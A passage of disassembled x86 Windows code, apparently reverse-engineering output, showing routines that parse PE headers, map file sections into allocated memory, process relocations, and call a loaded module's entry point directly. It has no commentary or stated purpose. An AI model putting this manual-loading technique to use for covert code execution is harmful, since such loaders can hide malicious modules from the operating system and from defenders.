locret_419527: ; CODE XREF: sub_41945C+21�j
leave
retn
sub_41945C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419529 proc near ; DATA XREF: sub_419995+B34�o
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004198DE SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421490
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_10], 1
jnz loc_419746
mov [ebp+var_4], 1
call sub_41922D
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov eax, [ebp+arg_C]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_38], eax
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_38]
lea eax, [ecx+eax-28h]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+34h]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+38h]
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_34], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+40h]
mov [ebp+var_3C], eax
jmp short loc_4195F9
; ---------------------------------------------------------------------------
loc_4195F0: ; CODE XREF: sub_419529:loc_419663�j
mov eax, [ebp+var_38]
add eax, 28h
mov [ebp+var_38], eax
loc_4195F9: ; CODE XREF: sub_419529+C5�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_28]
jnb short loc_419665
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
push 0
push 0
push [ebp+var_50]
push [ebp+arg_0]
call sub_41441F
lea eax, [ebp+var_48]
push eax
push 0
push 0
push [ebp+var_4C]
mov eax, [ebp+var_38]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
push [ebp+arg_0]
call sub_415175
test eax, eax
jz short loc_419659
cmp [ebp+var_48], 0
jnz short loc_419663
loc_419659: ; CODE XREF: sub_419529+128�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419663: ; CODE XREF: sub_419529+12E�j
jmp short loc_4195F0
; ---------------------------------------------------------------------------
loc_419665: ; CODE XREF: sub_419529+D6�j
mov eax, [ebp+var_40]
mov eax, [eax+34h]
cmp eax, [ebp+var_24]
jz short loc_419684
push [ebp+var_30]
push [ebp+var_44]
push [ebp+var_40]
push [ebp+var_24]
call sub_41945C
add esp, 10h
loc_419684: ; CODE XREF: sub_419529+145�j
mov eax, [ebp+var_24]
add eax, [ebp+var_34]
mov [ebp+var_2C], eax
push 5Ch
push [ebp+arg_4]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4196AA
mov eax, [ebp+arg_4]
mov [ebp+var_20], eax
jmp short loc_4196B1
; ---------------------------------------------------------------------------
loc_4196AA: ; CODE XREF: sub_419529+177�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4196B1: ; CODE XREF: sub_419529+17F�j
push 1
push [ebp+var_20]
push [ebp+var_40]
push [ebp+var_24]
push [ebp+var_2C]
call sub_418730
add esp, 14h
mov eax, ds:dword_4248B4
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jz short loc_4196E8
mov eax, [ebp+var_60]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_64], 1
jmp short loc_4196EC
; ---------------------------------------------------------------------------
loc_4196E8: ; CODE XREF: sub_419529+1AA�j
and [ebp+var_64], 0
loc_4196EC: ; CODE XREF: sub_419529+1BD�j
movzx eax, [ebp+var_64]
test eax, eax
jz short loc_41972B
push offset sub_41EDE8
push ds:dword_424740
push [ebp+arg_C]
push [ebp+var_20]
mov ecx, ds:dword_4248B4
call sub_41EC8C
mov eax, ds:dword_4248B4
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_41972B
mov eax, [ebp+var_68]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_41972B: ; CODE XREF: sub_419529+1C9�j
; sub_419529+1F3�j
and [ebp+var_4], 0
jmp short loc_419741
; ---------------------------------------------------------------------------
loc_419731: ; DATA XREF: _4:004214A0�o
push [ebp+var_14]
call sub_41C317
retn
; ---------------------------------------------------------------------------
loc_41973A: ; DATA XREF: _4:004214A4�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_419741: ; CODE XREF: sub_419529+206�j
jmp loc_419873
; ---------------------------------------------------------------------------
loc_419746: ; CODE XREF: sub_419529+34�j
cmp [ebp+arg_10], 0
jnz loc_419866
call sub_41922D
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov [ebp+var_4], 2
mov eax, ds:dword_4248AC
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_419785
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_419789
; ---------------------------------------------------------------------------
loc_419785: ; CODE XREF: sub_419529+247�j
and [ebp+var_70], 0
loc_419789: ; CODE XREF: sub_419529+25A�j
movzx eax, [ebp+var_70]
test eax, eax
jz short loc_4197BA
push [ebp+arg_C]
mov ecx, ds:dword_4248AC
call sub_41EBBB
mov eax, ds:dword_4248AC
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4197BA
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_4197BA: ; CODE XREF: sub_419529+266�j
; sub_419529+282�j
push 5Ch
push [ebp+arg_4]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_4197D7
mov eax, [ebp+arg_4]
mov [ebp+var_54], eax
jmp short loc_4197DE
; ---------------------------------------------------------------------------
loc_4197D7: ; CODE XREF: sub_419529+2A4�j
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_54], eax
loc_4197DE: ; CODE XREF: sub_419529+2AC�j
mov eax, ds:dword_4248B4
mov [ebp+var_78], eax
cmp [ebp+var_78], 0
jz short loc_4197FF
mov eax, [ebp+var_78]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_7C], 1
jmp short loc_419803
; ---------------------------------------------------------------------------
loc_4197FF: ; CODE XREF: sub_419529+2C1�j
and [ebp+var_7C], 0
loc_419803: ; CODE XREF: sub_419529+2D4�j
movzx eax, [ebp+var_7C]
test eax, eax
jz short loc_41983F
push offset sub_41EDE8
push ds:dword_424740
push [ebp+var_54]
mov ecx, ds:dword_4248B4
call sub_41EBDB
mov eax, ds:dword_4248B4
mov [ebp+var_80], eax
cmp [ebp+var_80], 0
jz short loc_41983F
mov eax, [ebp+var_80]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_41983F: ; CODE XREF: sub_419529+2E0�j
; sub_419529+307�j
mov eax, [ebp+arg_4]
mov [ebp+var_5C], eax
push [ebp+var_5C]
call sub_41BACD
pop ecx
and [ebp+var_4], 0
jmp short loc_419864
; ---------------------------------------------------------------------------
loc_419854: ; DATA XREF: _4:004214AC�o
push [ebp+var_14]
call sub_41C317
retn
; ---------------------------------------------------------------------------
loc_41985D: ; DATA XREF: _4:004214B0�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_419864: ; CODE XREF: sub_419529+329�j
jmp short loc_419873
; ---------------------------------------------------------------------------
loc_419866: ; CODE XREF: sub_419529+221�j
call sub_41922D
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
loc_419873: ; CODE XREF: sub_419529:loc_419741�j
; sub_419529:loc_419864�j
cmp [ebp+arg_8], 0
jz short loc_4198CB
mov eax, [ebp+arg_C]
add eax, [ebp+arg_8]
mov [ebp+var_58], eax
mov ds:dword_4248A4, 0FFFFFFFEh
pushaw
mov ds:dword_4248C0, esp
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
call [ebp+var_58]
mov ds:dword_4248A4, eax
mov esp, ds:dword_4248C0
popaw
mov eax, ds:dword_4248A4
mov [ebp+var_1C], eax
mov ds:dword_4248A4, 0FFFFFFFEh
cmp [ebp+var_1C], 0FFFFFFFEh
jnz short loc_4198C9
and [ebp+var_1C], 0
loc_4198C9: ; CODE XREF: sub_419529+39A�j
jmp short loc_4198D2
; ---------------------------------------------------------------------------
loc_4198CB: ; CODE XREF: sub_419529+34E�j
mov [ebp+var_1C], 1
loc_4198D2: ; CODE XREF: sub_419529:loc_4198C9�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
jmp short loc_4198DE
sub_419529 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419529
loc_4198DE: ; CODE XREF: sub_419529+3B2�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_419529
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198F2 proc near ; CODE XREF: sub_418780+14C�p
; sub_418780:loc_4188EA�p
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_4248CC, 0
setnz al
pop ebp
retn
sub_4198F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419903 proc near ; CODE XREF: sub_418780:loc_4188DA�p
; sub_419995:loc_41A760�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_419909: ; CODE XREF: sub_419903+87�j
and [ebp+var_4], 0
cmp ds:dword_4248CC, 0
jz short loc_419984
mov [ebp+var_8], offset dword_4248CC
loc_41991D: ; CODE XREF: sub_419903:loc_419982�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_419984
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
push 1
mov eax, [ebp+var_C]
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_C]
push dword ptr [eax+8]
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_418730
add esp, 14h
movzx eax, al
test eax, eax
jz short loc_419977
mov [ebp+var_4], 1
mov eax, [ebp+var_8]
mov eax, [eax]
mov ecx, [ebp+var_8]
mov eax, [eax+10h]
mov [ecx], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_41BACD
pop ecx
jmp short loc_419982
; ---------------------------------------------------------------------------
loc_419977: ; CODE XREF: sub_419903+50�j
mov eax, [ebp+var_8]
mov eax, [eax]
add eax, 10h
mov [ebp+var_8], eax
loc_419982: ; CODE XREF: sub_419903+72�j
jmp short loc_41991D
; ---------------------------------------------------------------------------
loc_419984: ; CODE XREF: sub_419903+11�j
; sub_419903+20�j
movzx eax, [ebp+var_4]
test eax, eax
jnz loc_419909
mov al, [ebp+var_4]
leave
retn
sub_419903 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419995 proc near ; CODE XREF: sub_41CA0F+2F�p
; sub_41E119+1B�p
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_100 = dword ptr -100h
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = byte ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041A259 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 0041A29B SIZE 000004EE BYTES
; FUNCTION CHUNK AT 0041A822 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4214B8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 120h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_120], edx
mov [ebp+var_11C], ecx
or [ebp+var_3C], 0FFFFFFFFh
or [ebp+var_38], 0FFFFFFFFh
or [ebp+var_58], 0FFFFFFFFh
and [ebp+var_34], 0
and [ebp+var_30], 0
and [ebp+var_4C], 0
mov eax, ds:dword_4248C4
mov [ebp+var_48], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_54], 0
and [ebp+var_44], 0
and [ebp+var_50], 0
and [ebp+var_40], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
and [ebp+var_5C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push [ebp+var_11C]
call ds:dword_424698 ; GetModuleHandleA
test eax, eax
jz short loc_419A52
push [ebp+var_11C]
call ds:dword_4246DC ; LoadLibraryA
push 0FFFFFFFFh
mov [ebp+var_124], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_124]
jmp loc_41A822
; ---------------------------------------------------------------------------
loc_419A52: ; CODE XREF: sub_419995+91�j
push [ebp+var_120]
lea eax, [ebp+var_24]
push eax
push [ebp+var_11C]
call sub_4191AB
add esp, 0Ch
mov [ebp+var_6C], eax
cmp ds:dword_4248C4, 0
jz short loc_419AD6
cmp [ebp+var_6C], 0
jz short loc_419AD6
mov eax, ds:dword_4248C4
mov [ebp+var_74], eax
jmp short loc_419A9A
; ---------------------------------------------------------------------------
loc_419A86: ; CODE XREF: sub_419995:loc_419AD4�j
mov eax, [ebp+var_74]
mov eax, [eax+4]
mov [ebp+var_74], eax
mov eax, ds:dword_4248C8
inc eax
mov ds:dword_4248C8, eax
loc_419A9A: ; CODE XREF: sub_419995+EF�j
cmp [ebp+var_74], 0
jz short loc_419AD6
mov eax, [ebp+var_74]
mov eax, [eax]
cmp eax, [ebp+var_6C]
jnz short loc_419AD4
mov eax, ds:dword_4248C8
inc eax
mov ds:dword_4248C8, eax
push 0FFFFFFFFh
and [ebp+var_128], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_128]
jmp loc_41A822
; ---------------------------------------------------------------------------
loc_419AD4: ; CODE XREF: sub_419995+113�j
jmp short loc_419A86
; ---------------------------------------------------------------------------
loc_419AD6: ; CODE XREF: sub_419995+DF�j
; sub_419995+E5�j ...
and ds:dword_4248C8, 0
mov eax, [ebp+var_6C]
mov [ebp+var_4C], eax
lea eax, [ebp+var_4C]
mov ds:dword_4248C4, eax
cmp [ebp+var_6C], 0
jnz short loc_419B6D
push [ebp+var_120]
push 0
push [ebp+var_11C]
call ds:dword_4246D8 ; LoadLibraryExA
mov [ebp+var_78], eax
cmp [ebp+var_78], 0
jz short loc_419B2D
mov eax, [ebp+var_120]
and eax, 2
test eax, eax
jnz short loc_419B4C
push [ebp+var_11C]
push [ebp+var_78]
call sub_418B30
test eax, eax
jnz short loc_419B4C
loc_419B2D: ; CODE XREF: sub_419995+177�j
call ds:dword_424690 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_419B3F
push 7Eh
call ds:dword_42470C ; RtlRestoreLastWin32Error
loc_419B3F: ; CODE XREF: sub_419995+1A0�j
push [ebp+var_78]
call ds:dword_424660 ; FreeLibrary
and [ebp+var_78], 0
loc_419B4C: ; CODE XREF: sub_419995+184�j
; sub_419995+196�j
push 0FFFFFFFFh
mov eax, [ebp+var_78]
mov [ebp+var_12C], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_12C]
jmp loc_41A822
; ---------------------------------------------------------------------------
loc_419B6D: ; CODE XREF: sub_419995+15A�j
push 0
push 0
push [ebp+var_6C]
call sub_41BF82
add esp, 0Ch
mov [ebp+var_28], eax
push [ebp+var_28]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_419BB2
push 0FFFFFFFFh
mov eax, [ebp+var_7C]
mov [ebp+var_130], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_130]
jmp loc_41A822
; ---------------------------------------------------------------------------
loc_419BB2: ; CODE XREF: sub_419995+1FA�j
mov eax, [ebp+var_24]
mov [ebp+var_80], eax
jmp short loc_419BC1
; ---------------------------------------------------------------------------
loc_419BBA: ; CODE XREF: sub_419995:loc_419BDC�j
mov eax, [ebp+var_80]
inc eax
mov [ebp+var_80], eax
loc_419BC1: ; CODE XREF: sub_419995+223�j
mov eax, [ebp+var_80]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_419BDE
mov eax, [ebp+var_80]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jnz short loc_419BDC
mov eax, [ebp+var_80]
mov byte ptr [eax], 5Ch
loc_419BDC: ; CODE XREF: sub_419995+23F�j
jmp short loc_419BBA
; ---------------------------------------------------------------------------
loc_419BDE: ; CODE XREF: sub_419995+234�j
push 0
lea eax, [ebp+var_3C]
push eax
push 0
push 0
push [ebp+var_24]
call sub_414344
test eax, eax
jnz short loc_419C04
cmp [ebp+var_3C], 0
jnz short loc_419C04
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419C04: ; CODE XREF: sub_419995+25D�j
; sub_419995+263�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_3C]
call sub_414670
push 40h
call sub_41BA4A
pop ecx
mov [ebp+var_E8], eax
mov eax, [ebp+var_E8]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 40h
push [ebp+var_50]
push [ebp+var_3C]
call sub_415175
test eax, eax
jz short loc_419C46
cmp [ebp+var_64], 0
jnz short loc_419C50
loc_419C46: ; CODE XREF: sub_419995+2A9�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419C50: ; CODE XREF: sub_419995+2AF�j
push 0
push 0
mov eax, [ebp+var_50]
push dword ptr [eax+3Ch]
push [ebp+var_3C]
call sub_41441F
push 0F8h
call sub_41BA4A
pop ecx
mov [ebp+var_EC], eax
mov eax, [ebp+var_EC]
mov [ebp+var_44], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 0F8h
push [ebp+var_44]
push [ebp+var_3C]
call sub_415175
test eax, eax
jz short loc_419C9E
cmp [ebp+var_64], 0
jnz short loc_419CA8
loc_419C9E: ; CODE XREF: sub_419995+301�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419CA8: ; CODE XREF: sub_419995+307�j
mov eax, [ebp+var_44]
cmp dword ptr [eax], 4550h
jz short loc_419CBD
mov ecx, 0EF00000Ch
call sub_41BA32
loc_419CBD: ; CODE XREF: sub_419995+31C�j
mov eax, [ebp+var_44]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_44]
lea eax, [ecx+eax+18h]
sub eax, [ebp+var_44]
mov ecx, [ebp+var_50]
mov ecx, [ecx+3Ch]
add ecx, eax
mov [ebp+var_70], ecx
mov eax, [ebp+var_44]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_70]
add ecx, eax
mov [ebp+var_68], ecx
push 200h
mov eax, [ebp+var_68]
add eax, 28h
push eax
call sub_419437
pop ecx
pop ecx
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_41BA4A
pop ecx
mov [ebp+var_F0], eax
mov eax, [ebp+var_F0]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_34]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 200h
call sub_41BA4A
pop ecx
mov [ebp+var_F4], eax
mov eax, [ebp+var_F4]
mov [ebp+var_54], eax
mov ecx, 80h
mov eax, 90909090h
mov edi, [ebp+var_54]
rep stosd
push 0
push 0
push 0
push [ebp+var_3C]
call sub_41441F
lea eax, [ebp+var_64]
push eax
push 0
push 0
push [ebp+var_68]
push [ebp+var_1C]
push [ebp+var_3C]
call sub_415175
test eax, eax
jz short loc_419D86
cmp [ebp+var_64], 0
jnz short loc_419D90
loc_419D86: ; CODE XREF: sub_419995+3E9�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419D90: ; CODE XREF: sub_419995+3EF�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
add ecx, [eax+3Ch]
mov [ebp+var_98], ecx
mov eax, [ebp+var_98]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_98]
lea eax, [ecx+eax+18h]
mov [ebp+var_8C], eax
mov eax, [ebp+var_98]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_8C]
add ecx, eax
mov [ebp+var_88], ecx
mov eax, [ebp+var_98]
add eax, 88h
mov [ebp+var_90], eax
mov eax, [ebp+var_98]
add eax, 80h
mov [ebp+var_84], eax
mov eax, [ebp+var_98]
and dword ptr [eax+24h], 0
mov eax, [ebp+var_98]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_98]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_54]
mov ecx, [ebp+var_98]
mov ecx, [ecx+0A0h]
mov [eax+34h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_98]
mov ecx, [ecx+0A4h]
mov [eax+38h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_98]
mov ecx, [ecx+80h]
mov [eax+3Ch], ecx
mov eax, [ebp+var_54]
add eax, 40h
mov [ebp+var_94], eax
jmp short loc_419E67
; ---------------------------------------------------------------------------
loc_419E58: ; CODE XREF: sub_419995:loc_41A317�j
mov eax, [ebp+var_8C]
add eax, 28h
mov [ebp+var_8C], eax
loc_419E67: ; CODE XREF: sub_419995+4C1�j
mov eax, [ebp+var_8C]
cmp eax, [ebp+var_88]
jnb loc_41A31C
mov eax, [ebp+var_94]
mov ecx, [ebp+var_8C]
mov ecx, [ecx+14h]
mov [eax], ecx
mov eax, [ebp+var_94]
add eax, 4
mov [ebp+var_94], eax
mov eax, [ebp+var_94]
mov ecx, [ebp+var_8C]
mov ecx, [ecx+10h]
mov [eax], ecx
mov eax, [ebp+var_94]
add eax, 4
mov [ebp+var_94], eax
cmp ds:dword_424600, 2
jnb loc_419FBD
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_90]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_419FBD
mov eax, [ebp+var_8C]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_8C]
add eax, [ecx+10h]
mov ecx, [ebp+var_90]
cmp eax, [ecx]
jbe loc_419FBD
push 200h
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
call sub_419437
pop ecx
pop ecx
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_41BA4A
pop ecx
mov [ebp+var_F8], eax
mov eax, [ebp+var_F8]
mov [ebp+var_2C], eax
mov eax, [ebp+var_98]
push dword ptr [eax+38h]
mov eax, [ebp+var_8C]
push dword ptr [eax+8]
call sub_419437
pop ecx
pop ecx
mov ecx, [ebp+var_98]
mov ecx, [ecx+20h]
add ecx, eax
mov eax, [ebp+var_98]
mov [eax+20h], ecx
push 0
push 0
mov eax, [ebp+var_8C]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_41441F
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
push [ebp+var_2C]
push [ebp+var_3C]
call sub_415175
test eax, eax
jz short loc_419F95
cmp [ebp+var_64], 0
jnz short loc_419F9F
loc_419F95: ; CODE XREF: sub_419995+5F8�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_419F9F: ; CODE XREF: sub_419995+5FE�j
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_34]
mov [eax+14h], ecx
mov eax, [ebp+var_8C]
mov dword ptr [eax+24h], 0C0000040h
jmp loc_41A317
; ---------------------------------------------------------------------------
loc_419FBD: ; CODE XREF: sub_419995+52B�j
; sub_419995+542�j ...
mov eax, [ebp+var_8C]
mov ecx, [ebp+var_84]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_41A29B
mov eax, [ebp+var_8C]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_8C]
add eax, [ecx+10h]
mov ecx, [ebp+var_84]
cmp eax, [ecx]
jbe loc_41A29B
and [ebp+var_A0], 0
mov [ebp+var_4], 1
push 4
push 1000h
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
push 0
call ds:dword_424724 ; VirtualAlloc
mov [ebp+var_A0], eax
push 0
push 0
mov eax, [ebp+var_8C]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_41441F
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_8C]
push dword ptr [eax+10h]
push [ebp+var_A0]
push [ebp+var_3C]
call sub_415175
test eax, eax
jz short loc_41A05E
cmp [ebp+var_64], 0
jnz short loc_41A068
loc_41A05E: ; CODE XREF: sub_419995+6C1�j
mov ecx, 0EF00000Fh
call sub_41BA32
loc_41A068: ; CODE XREF: sub_419995+6C7�j
mov eax, [ebp+var_8C]
mov eax, [eax+0Ch]
mov [ebp+var_A8], eax
mov eax, [ebp+var_84]
mov eax, [eax]
sub eax, [ebp+var_A8]
mov ecx, [ebp+var_A0]
add ecx, eax
mov [ebp+var_A4], ecx
and [ebp+var_AC], 0
jmp short loc_41A0A9
; ---------------------------------------------------------------------------
loc_41A09C: ; CODE XREF: sub_419995:loc_41A25F�j
mov eax, [ebp+var_AC]
inc eax
mov [ebp+var_AC], eax
loc_41A0A9: ; CODE XREF: sub_419995+705�j
mov eax, [ebp+var_84]
mov eax, [eax+4]
xor edx, edx
push 14h
pop ecx
div ecx
cmp [ebp+var_AC], eax
jnb loc_41A264
mov eax, [ebp+var_AC]
imul eax, 14h
mov ecx, [ebp+var_A4]
cmp dword ptr [ecx+eax+0Ch], 0
jnz short loc_41A0E0
jmp loc_41A264
; ---------------------------------------------------------------------------
loc_41A0E0: ; CODE XREF: sub_419995+744�j
mov eax, [ebp+var_AC]
imul eax, 14h
